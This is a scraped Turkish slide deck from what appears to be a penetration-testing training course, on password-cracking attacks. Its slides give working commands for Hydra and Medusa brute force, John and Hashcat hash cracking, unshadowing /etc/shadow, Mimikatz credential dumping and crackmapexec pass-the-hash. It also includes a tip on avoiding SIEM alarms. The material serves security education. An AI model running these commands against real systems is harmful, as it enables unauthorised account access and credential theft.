Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - Exploitation
 
Practical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPractical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability Detection
 
Practical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPractical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information Gathering
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
 
Sızma Testi Metodolojileri
Sızma Testi MetodolojileriSızma Testi Metodolojileri
Sızma Testi Metodolojileri
 
Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?
 

Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları

  • 1. www.prismacsi.com © All Rights Reserved. 1 Uygulamalı Beyaz Şapkalı Hacker Eğitimi #8 Parola Kırma Saldırıları Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
  • 2. www.prismacsi.com © All Rights Reserved. 2 Konular • Parola ve Şifre Kavramları • Hash ve Salt Kavramları • Parola Kırma Saldırılarında Püf Noktalar • Saldırı Türleri • Wordlist Oluşturma • Kullanılan Araçlar
  • 3. www.prismacsi.com © All Rights Reserved. 3 Parola ve Şifre Kavramları • Parola: Açık metin, gizli tutulması gereken karakter dizisidir. Kullanıcı kendi belirler ve parolayı kullanarak belirli alanlara giriş sağlar. • Şifre: Parolanın bir algoritma aracılığı ile yeni bir formata dönüştürülmüş halidir.
  • 4. www.prismacsi.com © All Rights Reserved. 4 Hash ve Salt Kavramları • Hash: Bir verinin sabit sayıda bir özete çevrilmiş halidir. Özetten geri açık metin hale döndürme algoritması yoktur ve doğrulama amacıyla kullanılır. Örn: MD5 • Salt: Veriler hash algoritmalarından geçirilirken Rainbow Table saldırıları aracılığıyla kolayca kırılamasın diye verinin sonuna, başına veya ortasında bir yere yerleştirilen karakter dizisidir. • Prisma -> hash -> 112312311231 • Prisma -> salt(sona +++) -> Prisma+++ -> 1823891239812
  • 5. www.prismacsi.com © All Rights Reserved. 5 Parola Kırma Saldırılarında Püf Noktalar • Saldırıların temelinde her zaman istihbarat vardır. • Yapacağını bir parola kırma saldırısı için öncesinde kurum veya şahısa karşı bir istihbarat çalışması yapıldıysa ve burada internete sızdırılmış bir parola yakalandıysa bu kesinlikle wordlistlere eklenmelidir. • En doğru saldırı, istihbarat eşliğinde gerçekleşecek! • Baştan sona tüm adımları doğru atmak bu yüzden önemli. Sızıntı kaynaklarını kontrol etmek gerek. • Paste siteleri • Haveibeenpwned vs.
  • 6. www.prismacsi.com © All Rights Reserved. 6 Parola Kırma Saldırılarında Püf Noktalar • Parola tahmini için brute force (kaba kuvvet) saldırıları gerçekleştirilebilir. Bu saldırıların dezavantajları şöyledir: • Yapılan saldırı sonucu kullanıcıların hesapları kilitlenebilir. Bknz: Lockout Policy • Bu yapılan saldırı sonrası ağ cihazlarında veya SIEM üzerinde çok fazla alarm üretilebilir. Bu durum işimize gelmeyecektir. • Bir sisteme sızıldığında oradan parola özetleri (hash) elde edilebilir. Bu durumda Hash Crack saldırısı gerçekleştirmek gerekir. • Genelde localde ve sessiz, sakin bir süreç ile tamamlanır. • Elde edilen hash bilgileri kırıldığında siber saldırı evrimleşir.
  • 7. www.prismacsi.com © All Rights Reserved. 7 Parola Kırma Saldırılarında Püf Noktalar • Bir sisteme sızıldığında ve elde edilen hashler kırıldığında siber saldırı evrimleşir dedik. Neden? • Kurum içi parola politikaları genelde yeterince sıkılaştırılmış olmuyor. • Bu kırılan parola ile bir Password Spraying Attack gerçekleştirildiğinde birçok sistemin parolasının aynı olduğu görülebilir. • Böylece elde edilen bir parola aracılığı ile birden fazla sisteme sızılabilir. • Domain exploitation konusunu hatırlayın J Belki de domain admine giden yolu elde etmenize olanak sağlayacaktır.
  • 8. www.prismacsi.com © All Rights Reserved. 8 Saldırı Türleri • Aktif Saldırılar: • Brute Force (Kava Kuvvet) Saldırıları • Password Spraying Saldırıları • Pasif Saldırılar: • Hash Crack Saldırıları • Rainbow Table Saldırıları
  • 9. www.prismacsi.com © All Rights Reserved. 9 Wordlist Oluşturma • Bir parola kırma saldırısı içerisinde random oluşturulacak parola kombinasyonları yerine tespit edilen bir formata göre kendinize wordlist oluşturabilirsiniz. • Bu formatı nasıl tespit edebilirsiniz? • Siber istihbarat J • Aynı kurum veya şirketten birden fazla kişinin parolası internete sızmış mı? • Sızdıysa aralarında bir benzerlik var mı? • Ankara8817! • Ankara7625!
  • 10. www.prismacsi.com © All Rights Reserved. 10 Wordlist Oluşturma • Wordlist oluşturulurken genelde crunch aracını kullanıyoruz. • Oldukça kullanışlı ve esnek, dolayısıyla istediğiniz kombinasyonları üretmenize olanak sağlıyor. • Basit kullanım: • crunch 6 7 abc123 • 6 ve7 karakterden oluşan ve içeriğinde abc123 karakterlerini barındıran bir wordlist • crunch 6 8 1234567890 -o numericwordlist.lst • 6 ve 8 karakterden oluşan ve içeriğinde tüm rakamları barındıran bir wordlist
  • 11. www.prismacsi.com © All Rights Reserved. 11 Wordlist Oluşturma • Peki ya biraz önce keşfettiğimiz Ankara’lı formata göre bir parola listesi oluşturmak istesek? • Ankara0000! • Ankara0001! • Ankara0002! • İşte bu noktada crunchın güzel parametrelerinden faydalanabilirsiniz. • crunch 11 11 1234567890 –t Ankara@@@@! –o wordlist –z • -z parametresi ziplemek amacıyla kullanılır
  • 12. www.prismacsi.com © All Rights Reserved. 12 Wordlist Oluşturma • Karakter setleri ile de bir wordlist oluşturabilirsiniz. • Karakter listeleri şurada: • /usr/share/rainbowcrack/charset.txt • crunch 7 7 -f /usr/share/rainbowcrack/charset.txt mixalpha -o liste -z
  • 13. www.prismacsi.com © All Rights Reserved. 13 Crunch - Uygulama
  • 14. www.prismacsi.com © All Rights Reserved. 14 Crunch - Uygulama
  • 15. www.prismacsi.com © All Rights Reserved. 15 CUPP - Uygulama • CUPP isim, soy isim, nickname, doğum tarihi gibi parametreleri alarak wordlist oluşturmaktadır.
  • 16. www.prismacsi.com © All Rights Reserved. 16 Hydra • Tespit edilen servislere bruteforce saldırıları ypaılmak istendiğinde hydra oldukça kullanışlıdır. • Aracı komut satırı üstünden veya var olan GUI’si (xHydra) aracılığı ile kullanabilirsiniz. • Bir veya birden fazla kullanıcıya veya hedefe parola kırma saldırısı gerçekleştirebilirsiniz.
  • 17. www.prismacsi.com © All Rights Reserved. 17 Hydra - Uygulama • Örnek kullanımlar: • hydra -l user -P passlist.txt ftp://192.168.0.1 • hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN • hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 • hydra -l admin -p password ftp://[192.168.0.0/24]/ • hydra -L logins.txt -P pws.txt -M targets.txt ssh
  • 18. www.prismacsi.com © All Rights Reserved. 18 xHydra - Uygulama • xHydra, Hydra’nın grafik arayüzlü halidir.
  • 19. www.prismacsi.com © All Rights Reserved. 19 Medusa • Komut satırı üzerinden kullanılan ve bizim en sık kullandıklarımız arasında yer alan bir parola kırma saldırısı aracıdır. • Yine hydra nın özelikleri içerisinde de bulunduğu gibi birden fazla hedefe saldırı yapılabilir ve wordlistler aracılığıyla birçok protokole parola kırma saldırısı gerçekleştirilebilir.
  • 20. www.prismacsi.com © All Rights Reserved. 20 Medusa - Uygulama • medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M http • medusa -h 10.0.1.5 –U userlistesi.txt –p “secretpass” -M smbnt • medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M ftp • medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M telnet • Medusa aşağıdaki tüm servisleri desteklemektedir. • AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VNC
  • 21. www.prismacsi.com © All Rights Reserved. 21 Metasploit • Metasploit içerisinde parola kırma saldırılarına imkan sunan auxiliary modülleri barındırmaktadır. • Örnek olarak smb ye bruteforce saldırısı yapılmak istendiğinde aşağıdaki modül kullanılabilir. • use auxiliary/scanner/smb/smb_login
  • 22. www.prismacsi.com © All Rights Reserved. 22 Sparta • Sparta basit seviyede zafiyet tarama aracı olmasıyla birlikte arayüz üzerinden bruteforce parola kırma saldırılarına izin veren kullanışlı bir toldur.
  • 23. www.prismacsi.com © All Rights Reserved. 23 Patator • Kali’de default olarak kurulu olarak gelmez. • https://github.com/lanjelot/patator • Komut satırından çalışmaktadır ve oldukça basit bir kullanımı vardır.
  • 24. www.prismacsi.com © All Rights Reserved. 24 Burp Suite • Web uygulamalarına Burp Suite Intruder kullanılarak bruteforce saldırısı gerçekleştirilebilir. • Uygulama
  • 25. www.prismacsi.com © All Rights Reserved. 25 Hash Kırma Saldırıları • Hash-Buster • https://github.com/s0md3v/Hash-Buster • Online birçok adresten otomatize hash kontrolü • buster –s <hash> • buster –f /root/hash.txt • buster –d /root/Desktop
  • 26. www.prismacsi.com © All Rights Reserved. 26 Hash Kırma Saldırıları • John-the-ripper • Offline (Çevrimdışı) hash kırma aracı olarak tanımlanır. • Oldukça kullanışlı ve pratiktir. • Bir linux makineye sızdınız ve hashleri alacaksınız. • unshadow /etc/passwd /etc/shadow > hashlist • john --wordlist /usr/share/wordlists/rockyou.txt hashlist • cat /root/.john/john.pot
  • 27. www.prismacsi.com © All Rights Reserved. 27 Hash Kırma Saldırıları • John-the-ripper birçok formatı desteklemektedir. • john --list=formats : formatları görüntüleyebilirsiniz. • john --format=LM hashfile • john --format=oracle hashfile
  • 28. www.prismacsi.com © All Rights Reserved. 28 Hash Kırma Saldırıları • Hashcat yine komut satırı üstünden yönetebileceğiniz ve size gpu cracking dahil birçok fonksiyon sunan gelişmiş bir parola kırma aracıdır. • Birçok parametresi mevcut bu yüzden kullanırken manuali okumakta fayda var. • hashcat -h • Örneğin bir md5 ile hashlenmiş parolayı kırmak istediğinizde: • hashcat -m 0 -a 0 -o passlist hashlist /usr/share/wordlists/rockyou.txt • -m 0 : md5 algoritmasını işaretlemekte • -a 0 : sözlük saldırısı yapmayı işaretlemekte
  • 29. www.prismacsi.com © All Rights Reserved. 29 Rainbow Table Atakları • Bruteforce ataklar zaman alıyor. • Daha önceden elimizde hashlenmiş bir wordlist varsa? • parola - hash karşılığı • parola2 - hash karşılığı • parola3 - hash karşılığı • Saniyeler içerisinde çözümlenebilir. • www.cmd5.org
  • 30. www.prismacsi.com © All Rights Reserved. 30 Hafızadan Parola Elde Etme • Mimikatz ile hafızadan açık metin parola yakalayabilirsiniz. • Bunun için sistemde yetkili bir session elde etmek gerekiyor. • Mimikatz binaryleri ile veya crackmapexec ile bu işi çözebilirsiniz. • https://github.com/gentilkiwi/mimikatz • mimikatz.exe • privilege::debug • sekurlsa::logonPasswords full • crackmapexec smb 10.0.1.5 -u Administrator -p ’Passwd123!' -M mimikatz
  • 31. www.prismacsi.com © All Rights Reserved. 31 Pass the Hash Saldırıları • Crackmapexec ile gösterimini yapmıştık. • Windows makineden hashdump ile alınan hashleri bir başka suncuya giriş için kullanabilirsiniz. • Hash kırmanıza gerek yok, direk hash i parola olarak kullanabiliyorsunuz. • Metasploit üzerindeki smb_login ile giriş denemesi yapabilir, psexec exploiti ile makineye sızabilirsiniz. • Crackmapexec : • crackmapexec smb 10.0.1.5 -u username -H NTHASH
  • 32. www.prismacsi.com © All Rights Reserved. 32 Uygulamalar
  • 33. www.prismacsi.com © All Rights Reserved. 33 Sorular?
  • 34. www.prismacsi.com © All Rights Reserved. 34 www.prismacsi.com info@prismacsi.com 0 850 303 85 35 /prismacsi İletişim